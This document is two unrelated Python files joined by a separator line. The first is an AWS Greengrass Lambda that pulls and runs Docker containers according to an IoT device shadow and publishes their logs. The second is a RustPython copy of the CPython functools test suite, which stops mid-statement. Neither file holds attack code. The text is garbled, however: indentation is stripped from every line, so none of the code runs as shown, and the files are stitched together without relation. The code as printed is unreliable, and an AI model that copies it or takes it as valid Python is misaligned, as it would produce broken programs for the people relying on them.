ggc_client = greengrasssdk.client('iot-data')
# create client for interacting with docker
# additional options may be needed if networking containers
docker_client = docker.from_env()
# Retrieving platform information to send from Greengrass Core
my_platform = platform.platform()
# Logging setup
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
streamHandler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
# get environmental variables
GROUP_ID = os.environ['GROUP_ID']
THING_NAME = os.environ['AWS_IOT_THING_NAME']
THING_ARN = os.environ['AWS_IOT_THING_ARN']
# initialize generic response
payload = {}
payload['group_id'] = GROUP_ID
payload['thing_name'] = THING_NAME
payload['thing_arn'] = THING_ARN
# setup OUTBOUND topics
base_docker_topic = THING_NAME +'/docker'
info_topic = base_docker_topic + '/info'
log_topic = base_docker_topic + '/logs'
# publishes info json to the THING_NAME/docker/info topic
# for general information from the lambda
def send_info(payload_json):
ggc_client.publish(topic=info_topic, payload=json.dumps(payload_json).encode())
# publishes log json to the THING_NAME/docker/log topic
# ONLY for logs from docker containers
def send_log(payload_json):
ggc_client.publish(topic=log_topic, payload=json.dumps(payload_json).encode())
# Kill and remove all running containers upon lambda startup
def kill_all_containers():
all_containers = docker_client.containers.list()
for container in all_containers:
kill_msg = {"message":"Killing and removing container: " + container.name}
send_info(kill_msg)
container.stop()
container.remove()
survival_msg = {"message":"Containers surviving: " + str(docker_client.containers.list())}
send_info(survival_msg)
# Clears all current containers and updates them to match
# the docker_config
def update_containers(docker_config):
send_info({"message":"updating containers..."})
kill_all_containers()
for image_info in docker_config['image_config_list']:
process_image_info(image_info)
# Work on a single image definition, ie one entry in image_config_list
def process_image_info(image_info):
send_info({"message":"Working on image " + image_info['image_name'] + "."})
update_status_of_container(image_info['image_name'], "yellow")
if not image_info['use_local']:
pull_image(image_info['image_name'])
run_containers(image_info)
# pull a single image from dockerhub using it's string name
# TODO: ECR integration
def pull_image(image_name):
send_info({"message":"Pulling container: " + image_name})
docker_client.images.pull(image_name)
send_info({"message":"Pulled container: " + image_name})
# Run an arbitrary number of containers from the same image
# According to additional options supplied by the image_info
# dictionary.
def run_containers(image_info):
# pull information from the image_info object
num_containers = image_info['num_containers']
image_name = image_info['image_name']
docker_run_args = image_info['docker_run_args']
image_time_out = image_info['timeout']
send_info({'message':'With image '+image_name+', running '+str(num_containers)+' containers.'})
# repeat for multiple containers according to the info above
for i in range(num_containers):
# use the docker_run_args specified in the image_info as docker run's kwargs
container = docker_client.containers.run(image_name, **docker_run_args)
send_info({"message":"Running container with name: " + container.name + " and timeout " + str(image_time_out)})
# Spawn a logger_timer thread. note that this in turn will spawn its own thread,
# this is the only way I could think of doing this without extending the scope
# of the thread information
t = threading.Thread(target=logger_timer, args=(container, image_name, image_time_out,))
update_status_of_container(image_name, "green")
t.start()
# Spawns a log_stream_worker thread on container
# that is terminated after timeout
def logger_timer(container, image_name, time_out):
stopevent = threading.Event()
testthread = threading.Thread(target=log_stream_worker, args=(container, image_name, stopevent))
testthread.start()
# Join the thread after the timeout
# regardless of exit status
testthread.join(timeout=time_out)
# toggle the event so the thread will stop
# otherwise the thread would continue
stopevent.set()
update_status_of_container(image_name, "red")
send_info({"message":"Container "+ container.name + " has stopped (whether by timeout or error)"})
container.stop()
return
# Continually read and publish the logs of a container
def log_stream_worker(container, image_name, stopevent):
# initilize an initial payload
container_payload = {}
container_payload['thing_name'] = THING_NAME
container_payload['container_name'] = container.name
container_payload['container_output'] = ""
container_payload['container_image'] = image_name
# stream the container logs
# note this for loop does not terminate unless the stopevent is set
for line in container.logs(stream=True):
container_payload['container_output'] += line.decode()
if "\n" in line.decode():
container_payload['container_output'] = container_payload['container_output'].strip()
send_log(container_payload)
container_payload['container_output'] = ""
if stopevent.isSet():
return
def convert_keys_to_string(dictionary):
"""Recursively converts dictionary keys to strings."""
if not isinstance(dictionary, dict):
return dictionary
return dict((str(k), convert_keys_to_string(v))
for k, v in dictionary.items())
# Set the status of the container in the shadow to "green" (currently running), "yellow" (starting up), or red (not running due to shut-down, pre-initialization or error)
def update_status_of_container(image_name, status):
my_shadow = json.loads(ggc_client.get_thing_shadow(thingName=THING_NAME)['payload'])
my_reported_shadow = my_shadow["state"]['reported']
for container in my_reported_shadow['docker_config']['image_config_list']:
if image_name == container["image_name"]:
container['status'] = status
reported_state = {
"state": {
"desired": json.loads(convert_keys_to_string(json.dumps(my_reported_shadow))),
"reported": json.loads(convert_keys_to_string(json.dumps(my_reported_shadow)))
}
}
print(reported_state)
update_my_shadow(reported_state)
send_info({"my_shadow":reported_state})
return
return "ERROR - Docker image with that name was not deployed"
# update the shadow of this AWS Thing
def update_my_shadow(json_payload):
ggc_client.update_thing_shadow(thingName=THING_NAME, payload=json.dumps(json_payload).encode())
# Takes a desired state, updates containers, and reports new state
def update_to_desired_state(desired_state):
# if no config present, no updates needed, at least not on our end
if 'docker_config' not in desired_state:
return
desired_config = desired_state['docker_config']
# update containers. if this fails the runtime will crash
# so updating the reported state below will never execute
# if update_containers succeeds, report the new state
reported_state = {
"state": {
"reported": desired_state
}
}
update_my_shadow(reported_state)
update_containers(desired_config)
# Executed upon startup of GG daemon or upon deployment of this lambda
# note: this is not the only entry point, the function_handler below
# is invoked upon shadow delta update
def main():
send_info({"message":"Lambda starting. Executing main..."})
ecr_cli = boto3.client('ecr', region_name='us-east-1')
token = ecr_cli.get_authorization_token()
username, password = base64.b64decode(token['authorizationData'][0]['authorizationToken']).decode().split(':')
registry = token['authorizationData'][0]['proxyEndpoint']
docker_client.login(username, password, registry=registry)
try:
my_shadow = json.loads(ggc_client.get_thing_shadow(thingName=THING_NAME)['payload'].decode())
except:
send_info({"message": "No shadow was created! Automatically generating empty shadow"})
update_my_shadow({
"state":{
"desired":{"welcome": "AWS-Test"},
"reported":{"welcome": "AWS-Test"},
}
})
send_info({"my_shadow":my_shadow})
if 'desired' in my_shadow['state']:
desired_state = my_shadow['state']['desired']
update_to_desired_state(desired_state)
# invoke main
main()
# handler for updates on the topic
# $aws/things/${AWS_IOT_THING_NAME}/shadow/update/delta
# which means it will be invoked whenever the shadow is changed
# "event" parameter is a description of the delta
def function_handler(event, context):
send_info({"message":"Handling delta..."})
# if no state info present, nothing we can do
if 'state' not in event:
return
# the delta channel spits back the desired state
# if desired and reported states differ
desired_state = event['state']
update_to_desired_state(desired_state)
return
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, thread 'main' has overflowed its stack on Windows")
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle(self):
super().test_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_recursive_pickle(self):
super().test_recursive_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# TODO: RUSTPYTHON
def test_pickle(self):
TestPartial.test_pickle(self)
# TODO: RUSTPYTHON
def test_recursive_pickle(self):
TestPartial.test_recursive_pickle(self)
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertWarns(DeprecationWarning):
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
